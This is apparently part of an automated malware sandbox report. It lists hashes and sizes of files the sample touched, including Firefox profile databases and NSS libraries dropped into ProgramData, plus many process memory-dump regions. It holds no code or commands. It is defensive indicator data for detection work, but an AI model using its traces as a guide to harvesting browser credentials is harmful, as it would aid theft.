SHA256d74b1c38f603f3933a1b7dca64f163806789ae3ff7145bf6a7a2d8c98de5f2bd
SHA512a8e724a5723ca6fed59d0b8132d11ff95480d1ac7a7f497ad585f1a46709e02e837a5a3df4a033e36b5f24a13586d850fcbeff5040e43f42548f7cf0864ac122
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\places.sqliteFilesize
5.0MB
MD593f0e64b1f77f8a18f36929cdacc5b51
SHA144c6a4282e1f53daca32efd39cceb99db5189711
SHA25693b0abda2a6cd91a6c5eab8fa2508e000d38e7c525e56746626e5afa5e9717d3
SHA51259a2929a6b346c92476e2f30388cc87269df947c2d42de5ef23f4f556441d093b188cb6c1c71d95166bf03b172cc8922dd49d6c91314095b83a14f23fbba0c54
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs-1.jsFilesize
6KB
MD5a4c968b3f17e990bd712c11496fa2f18
SHA1df80ab30f5eece37b91759576481089f6e4f5d2f
SHA256dd7a28b9a0a23a5f2d26288158642a5f6f558ad750dbc0c705a81e5a2b7519e6
SHA5128158deb852712a42f15dcf87a957af30fed6241fa66e72bf988d55ab34f591648b6e8f351b9ed2c90fd7dabf81fddb13d2a54be97baffffe231080646fcb499f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.jsFilesize
6KB
MD5716e9caad78b7e4e353044c0e2920a2b
SHA14aa1703230a7aba12f8472a2448b128c1f40c8e2
SHA256699fc83f70230fe71d23ab09c7449e324ac01c32e247466989940b5f79725f8f
SHA51226ddad9d9c294030034e749b548804049939e0d01e61b4d429b2bce65667d507648ff21f9c609ddab815c556dce6f3d6d4be56db113bba0bd85a7ee727107a82
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.jsFilesize
6KB
MD562f2da39619acfd0e757d97d84404bef
SHA1a482ff58a65b4fdaae3b02fc9feb1985cc79f1e6
SHA256e71e311e7e0fe4e68938a10ca24fee7bcc96ffae2eb0c7fb26e4c65ccd9be093
SHA5125d0d4a8a85819a2f64081590800b3e1dbc5cbdfec68c31beffc6ca5522921feac3339f3c6cc9271f2f3800122c3855e7a23f704782a7ef6672dc43ac3215eed9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.jsFilesize
6KB
MD53e0ffcf1797cff0911b7673eabc7f0ba
SHA139275b5f2a619b9b0233e521a6f4b5a51977b2c1
SHA25688fd92ea92d06ed08de3e60cc1e16838c1e5c9a62f5e550927b2d5944d9f8c15
SHA5120e2ee40cf7c97350598b896c27e7fafeba482b9f897f226f54c74e994044ec04a3a5b841d9f563f72562fd335fcb83333d33ec896aeb87d9429ecdf2118cd4bf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\sessionstore-backups\recovery.jsonlz4Filesize
1KB
MD5712534df9523aa1c0ed5ffb4363c37b0
SHA1e446c99998c97933e970355f0c2077d6e35e226f
SHA256a786b9661212c46465501668f159bab7e4cd4b90cd6b85fd6e9ad976c40e2991
SHA51276d1f6fd5744ad775d2dc956f91009d2436179052d45535bf7054d0cccfb8f43cfb466547529f99c7a7ab85955eea7077caac90b7ef8fa2eb0a30eb088d2cfe3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\sessionstore.jsonlz4Filesize
2KB
MD5d8bac7f4e81c6d7e6c165a2414cf8b41
SHA1ee7edd7e49096f7c3c8275d46842c1778f12ee7a
SHA2561d464135d119afc8fdfb6bb5d71fa479b07d6ab2b92564d350576ec220d9a3b6
SHA5122c382275210efb557f12de7f35bb732ee1aa1f493cc56a3203e59b0e484cd95fb35ac5f24390acb5f5e1ed26a57f4497fb4fb1f00af33b9ffb9f1d75975940a9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteFilesize
48KB
MD5b6d64e704482e52944546f259f9ecda8
SHA1c4917fd19b69025c195e60a5cd8f352d00967aca
SHA25606449acfd7a95522a6e1ca66d9f8095128c8b9742568bb2cf72aabc3e33438f1
SHA5121fc9ef39ab9bed5e79597b3bb8e78295b68c1a08a2e3ce8719dd07738e638b6c218c6a13ca096c08222cad0760e3bf52efe479c8529e6feea784be591d5a0f2f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteFilesize
184KB
MD53018d1aad8385b734068dbad441e344e
SHA12a3925bc92ec843db64b6db2cd6fe18ccf084a86
SHA256f33415b0b1fc8c7e52356318d44aef1ae6bd9c64a89afa012d43a01a79954f88
SHA5127ab1a1115a4f7ac61ba41bfe5875792cfa84d81f14f71239e43848de5940bfa07e2e34ea4be85a61c091d0b4b7742f3f55961fd26734b528cdb2c0b4d169c5e0
-
\??\pipe\crashpad_6920_WUCLWQYWQEUNVSHWMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
memory/196-769-0x00000000013A0000-0x000000000185A000-memory.dmpFilesize
4.7MB
-
memory/196-3686-0x00000000013A0000-0x000000000185A000-memory.dmpFilesize
4.7MB
-
memory/344-2-0x0000000004D40000-0x0000000004DDC000-memory.dmpFilesize
624KB
-
memory/344-0-0x00007FFA72C70000-0x00007FFA72E4B000-memory.dmpFilesize
1.9MB
-
memory/344-1-0x00000000004E0000-0x00000000004E8000-memory.dmpFilesize
32KB
-
memory/400-20413-0x0000000000050000-0x000000000050A000-memory.dmpFilesize
4.7MB
-
memory/816-15830-0x0000000000320000-0x0000000000824000-memory.dmpFilesize
5.0MB
-
memory/992-15221-0x0000000000600000-0x0000000000922000-memory.dmpFilesize
3.1MB
-
memory/992-15223-0x0000000005150000-0x000000000516C000-memory.dmpFilesize
112KB
-
memory/992-15222-0x0000000005370000-0x00000000054C4000-memory.dmpFilesize
1.3MB
-
memory/1372-15598-0x0000000008450000-0x000000000849B000-memory.dmpFilesize
300KB
-
memory/1372-20358-0x0000000009E80000-0x000000000A042000-memory.dmpFilesize
1.8MB
-
memory/1372-20359-0x000000000A580000-0x000000000AAAC000-memory.dmpFilesize
5.2MB
-
memory/1372-19357-0x00000000090B0000-0x00000000090CE000-memory.dmpFilesize
120KB
-
memory/1372-15507-0x0000000008340000-0x000000000844A000-memory.dmpFilesize
1.0MB
-
memory/1372-15551-0x00000000082E0000-0x000000000831E000-memory.dmpFilesize
248KB
-
memory/1372-15286-0x0000000000400000-0x0000000000470000-memory.dmpFilesize
448KB
-
memory/1372-15506-0x00000000087D0000-0x0000000008DD6000-memory.dmpFilesize
6.0MB
-
memory/1372-15508-0x0000000008280000-0x0000000008292000-memory.dmpFilesize
72KB
-
memory/1824-12721-0x0000000000400000-0x00000000004AC000-memory.dmpFilesize
688KB
-
memory/1824-12727-0x0000000005250000-0x0000000005338000-memory.dmpFilesize
928KB
-
memory/1824-14936-0x0000000005200000-0x0000000005208000-memory.dmpFilesize
32KB
-
memory/1824-14937-0x00000000054B0000-0x0000000005506000-memory.dmpFilesize
344KB
-
memory/1876-18-0x0000000007390000-0x00000000073B2000-memory.dmpFilesize
136KB
-
memory/1876-20-0x0000000007AE0000-0x0000000007B46000-memory.dmpFilesize
408KB
-
memory/1876-33-0x00000000084A0000-0x0000000008516000-memory.dmpFilesize
472KB
-
memory/1876-124-0x0000000009320000-0x00000000093B4000-memory.dmpFilesize
592KB
-
memory/1876-16-0x0000000006CA0000-0x0000000006CD6000-memory.dmpFilesize
216KB
-
memory/1876-27-0x00000000083B0000-0x00000000083FB000-memory.dmpFilesize
300KB
-
memory/1876-17-0x00000000074B0000-0x0000000007AD8000-memory.dmpFilesize
6.2MB
-
memory/1876-26-0x0000000007BD0000-0x0000000007BEC000-memory.dmpFilesize
112KB
-
memory/1876-21-0x0000000007D30000-0x0000000008080000-memory.dmpFilesize
3.3MB
-
memory/1876-19-0x0000000007430000-0x0000000007496000-memory.dmpFilesize
408KB
-
memory/1876-126-0x00000000092B0000-0x00000000092D2000-memory.dmpFilesize
136KB
-
memory/1876-125-0x0000000009240000-0x000000000925A000-memory.dmpFilesize
104KB
-
memory/2624-29-0x0000000000400000-0x0000000000436000-memory.dmpFilesize
216KB
-
memory/2912-20345-0x0000000000400000-0x0000000000442000-memory.dmpFilesize
264KB
-
memory/2912-20374-0x0000000005F70000-0x0000000005FC0000-memory.dmpFilesize
320KB
-
memory/4824-12214-0x00000000089D0000-0x0000000008C02000-memory.dmpFilesize
2.2MB
-
memory/4824-12006-0x0000000000EB0000-0x0000000000F58000-memory.dmpFilesize
672KB
-
memory/4824-12716-0x000000000BD60000-0x000000000BE2E000-memory.dmpFilesize
824KB
-
memory/4824-12715-0x000000000B8F0000-0x000000000BC40000-memory.dmpFilesize
3.3MB
-
memory/4824-12357-0x0000000008F80000-0x0000000008FD6000-memory.dmpFilesize
344KB
-
memory/4840-7347-0x0000000000EB0000-0x0000000001418000-memory.dmpFilesize
5.4MB
-
memory/4840-6416-0x0000000000EB0000-0x0000000001418000-memory.dmpFilesize
5.4MB
-
memory/5004-10-0x0000000005490000-0x000000000598E000-memory.dmpFilesize
5.0MB
-
memory/5004-12-0x0000000005190000-0x000000000519A000-memory.dmpFilesize
40KB
-
memory/5004-13-0x00000000051E0000-0x0000000005246000-memory.dmpFilesize
408KB
-
memory/5004-11-0x0000000005030000-0x00000000050C2000-memory.dmpFilesize
584KB
-
memory/5004-28-0x0000000005260000-0x0000000005268000-memory.dmpFilesize
32KB
-
memory/5004-8-0x00000000006F0000-0x0000000000780000-memory.dmpFilesize
576KB
-
memory/5004-9-0x00007FFA72C70000-0x00007FFA72E4B000-memory.dmpFilesize
1.9MB
-
memory/5104-3733-0x0000000000050000-0x000000000050A000-memory.dmpFilesize
4.7MB
-
memory/5104-15193-0x0000000000050000-0x000000000050A000-memory.dmpFilesize
4.7MB
-
memory/5228-12714-0x0000000005860000-0x0000000005954000-memory.dmpFilesize
976KB
-
memory/5228-7694-0x00000000050E0000-0x0000000005398000-memory.dmpFilesize
2.7MB
-
memory/5228-7680-0x0000000000650000-0x000000000090C000-memory.dmpFilesize
2.7MB
-
memory/5388-11507-0x0000000001250000-0x0000000001E3E000-memory.dmpFilesize
11.9MB
-
memory/5388-6997-0x0000000001250000-0x0000000001E3E000-memory.dmpFilesize
11.9MB
-
memory/5540-16803-0x0000000000050000-0x000000000050A000-memory.dmpFilesize
4.7MB
-
memory/5540-16253-0x0000000000050000-0x000000000050A000-memory.dmpFilesize
4.7MB
-
memory/5588-506-0x0000000000550000-0x0000000000628000-memory.dmpFilesize
864KB
-
memory/5588-507-0x000000001B2E0000-0x000000001B3F6000-memory.dmpFilesize
1.1MB
-
memory/5588-3622-0x000000001B220000-0x000000001B2BE000-memory.dmpFilesize
632KB
-
memory/5588-3634-0x00000000025F0000-0x000000000263C000-memory.dmpFilesize
304KB
-
memory/5836-15199-0x0000000001060000-0x0000000001647000-memory.dmpFilesize
5.9MB
-
memory/5836-6169-0x0000000001060000-0x0000000001647000-memory.dmpFilesize
5.9MB
-
memory/5928-346-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-374-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-352-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-350-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-354-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-380-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-340-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-338-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-336-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-334-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-332-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-326-0x00000000067E0000-0x0000000006D54000-memory.dmpFilesize
5.5MB
-
memory/5928-328-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-356-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-348-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-342-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-330-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-327-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-390-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-358-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-361-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-362-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-364-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-344-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-366-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-370-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-372-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-376-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-378-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-382-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-388-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-386-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-384-0x00000000067E0000-0x0000000006D4E000-memory.dmpFilesize
5.4MB
-
memory/5928-7681-0x0000000006500000-0x0000000006554000-memory.dmpFilesize
336KB
-
memory/5928-325-0x0000000000720000-0x0000000000C98000-memory.dmpFilesize
5.5MB
-
memory/5928-7649-0x0000000007D50000-0x0000000008100000-memory.dmpFilesize
3.7MB
-
memory/6256-15831-0x0000000000130000-0x0000000000A94000-memory.dmpFilesize
9.4MB
-
memory/6256-20360-0x0000000000130000-0x0000000000A94000-memory.dmpFilesize
9.4MB
-
memory/6256-20361-0x0000000000130000-0x0000000000A94000-memory.dmpFilesize
9.4MB
-
memory/6276-7640-0x0000000000050000-0x000000000050A000-memory.dmpFilesize
4.7MB
-
memory/6276-7853-0x0000000000050000-0x000000000050A000-memory.dmpFilesize
4.7MB
-
memory/6860-7639-0x000001E5C1930000-0x000001E5C19A6000-memory.dmpFilesize
472KB
-
memory/6860-6364-0x000001E5A9240000-0x000001E5A9262000-memory.dmpFilesize
136KB
-
memory/6956-7693-0x0000000000400000-0x00000000004B0000-memory.dmpFilesize
704KB
-
memory/6956-7697-0x0000000002FF0000-0x0000000002FF8000-memory.dmpFilesize
32KB
-
memory/7044-14967-0x00000204E0350000-0x00000204E036C000-memory.dmpFilesize
112KB
-
memory/7044-14973-0x00000204E0530000-0x00000204E05E9000-memory.dmpFilesize
740KB
-
memory/7044-15006-0x00000204E0370000-0x00000204E037A000-memory.dmpFilesize
40KB